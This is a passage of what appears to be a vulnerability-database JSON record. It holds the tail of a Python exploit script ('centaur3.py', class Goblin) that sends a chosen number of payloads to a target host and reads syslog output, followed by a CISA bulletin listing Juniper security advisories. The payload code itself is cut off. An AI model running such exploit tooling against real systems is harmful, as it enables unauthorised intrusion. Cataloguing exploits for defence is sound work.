- [{}/{}] payloads sent...\".format(amount, amount))\n\n def parse_sys_args(self):\n if len(sys.argv) >= 2:\n self.host = sys.argv[1]\n if not \"http\" in self.host:\n self.host = \"http://{}\".format(self.host)\n if len(sys.argv) == 3:\n # amount of packets to send\n self.payloads_to_send = sys.argv[2]\n else:\n self.print_help()\n\n def print_help(self):\n print(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0]))\n print(\"Example: centaur3.py 123.456.789.0:8080 200\")\n print(\"\\tThis will send 200 payloads to the aforementioned host\")\n print(\"\\tThe [port] and [amount of payloads] are optional\")\n exit(-1)\n\n def main(self):\n self.parse_sys_args()\n self.banner()\n ll = self.read_syslog(initial=True)\n self.send_payload(70)\n self.read_syslog()\n self.show_output()\n\nif __name__ == '__main__':\n Goblin().main()\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/centaur3.txt"}], "cisa": [{"lastseen": "2020-12-18T18:07:17", "bulletinFamily": "info", "cvelist": ["CVE-2015-2080", "CVE-2017-1000385", "CVE-2018-0016", "CVE-2018-0017", "CVE-2018-0018", "CVE-2018-0019", "CVE-2018-0020", "CVE-2018-0022", "CVE-2018-0023"], "description": "Juniper Networks has released security updates to address vulnerabilities affecting multiple products. 
A remote attacker could exploit some of these vulnerabilities to take control of an affected system.\n\nNCCIC encourages users and administrators to review the following Juniper Security Advisories and apply necessary updates:\n\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10844&cat=SIRT_1&actp=LIST>): Kernel crash upon receipt of crafted CLNP packets (CVE-2018-0016)\n * [SRX Series](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10845&cat=SIRT_1&actp=LIST>): Denial-of-service vulnerability in flowd daemon on devices configured with NAT-PT (CVE-2018-0017)\n * [SRX Series](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10846&cat=SIRT_1&actp=LIST>): Crafted packet may lead to information disclosure and firewall rule bypass during compilation of IDP policies (CVE-2018-0018)\n * [Junos](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10847&cat=SIRT_1&actp=LIST>): Denial-of-service vulnerability in SNMP MIB-II subagent daemon (mib2d) (CVE-2018-0019)\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10848&cat=SIRT_1&actp=LIST>): rpd daemon cores due to malformed BGP UPDATE packet (CVE-2018-0020)\n * [Steel-Belted Radius Carrier](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10849&cat=SIRT_1&actp=LIST>): Eclipse Jetty information disclosure vulnerability (CVE-2015-2080)\n * [NorthStar](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10850&cat=SIRT_1&actp=LIST>): Return of Bleichenbacher\u2019s Oracle Threat (ROBOT) RSA SSL attack (CVE-2017-1000385)\n * [OpenSSL](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10851&cat=SIRT_1&actp=LIST>): Multiple vulnerabilities resolved in OpenSSL\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10852&cat=SIRT_1&actp=LIST>): Multiple vulnerabilities in stunnel 5.38\n * [NSM Appliance](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10853&cat=SIRT_1&actp=LIST>): Multiple 
vulnerabilities resolved in CentOS 6.5-based 2012.2R12 release\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10854&cat=SIRT_1&actp=LIST>): Short MacSec keys may allow man-in-the-middle attacks\n * [Junos OS](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10855&cat=SIRT_1&actp=LIST>): Mbuf leak due to processing MPLS packets in VPLS networks (CVE-2018-0022)\n * [Junos Snapshot Administrator (JSNAPy)](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10856&cat=SIRT_1&actp=LIST>) world writeable default configuration file permission (CVE-2018-0023)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2018/04/12/Juniper-Networks-Releases-Security-Updates>); we'd welcome your feedback.\n", "modified": "2018-04-12T00:00:00", "published": "2018-04-12T00:00:00", "id": "CISA:32998D667194BA67A58624AE4C787D0A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2018/04/12/Juniper-Networks-Releases-Security-Updates", "type": "cisa", "title": "Juniper Networks Releases Security Updates", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}